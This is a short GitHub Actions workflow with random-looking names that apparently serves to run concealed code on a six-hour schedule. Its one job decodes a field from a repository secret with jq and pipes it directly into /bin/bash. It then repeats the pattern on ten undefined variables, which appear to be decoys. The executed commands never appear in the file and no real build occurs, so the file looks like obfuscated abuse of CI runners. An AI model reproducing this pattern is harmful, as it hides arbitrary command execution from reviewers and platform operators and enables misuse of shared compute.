name: caohong19870101

on:
  workflow_dispatch:
  schedule:
    - cron: '34 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caohong19870101
        env:
          cr6: ${{ secrets.cr6 }}
        run: |
          echo $cr6 | jq -r .rexeq510 | /bin/bash
          echo $oiypi612 | jq -r .hdqu798 | /bin/bash
          echo $ge32790 | jq -r .qcq1282 | /bin/bash
          echo $axwp19945 | jq -r .qrz51 | /bin/bash
          echo $fmzd24 | jq -r .opp012 | /bin/bash
          echo $yakfe85 | jq -r .q5 | /bin/bash
          echo $m97486 | jq -r .td15065 | /bin/bash
          echo $tkl229 | jq -r .rxnk25809 | /bin/bash
          echo $wsgak531 | jq -r .kl78506 | /bin/bash
          echo $gkeos04 | jq -r .jhgir71926 | /bin/bash
          echo $a0286 | jq -r .tk8 | /bin/bash

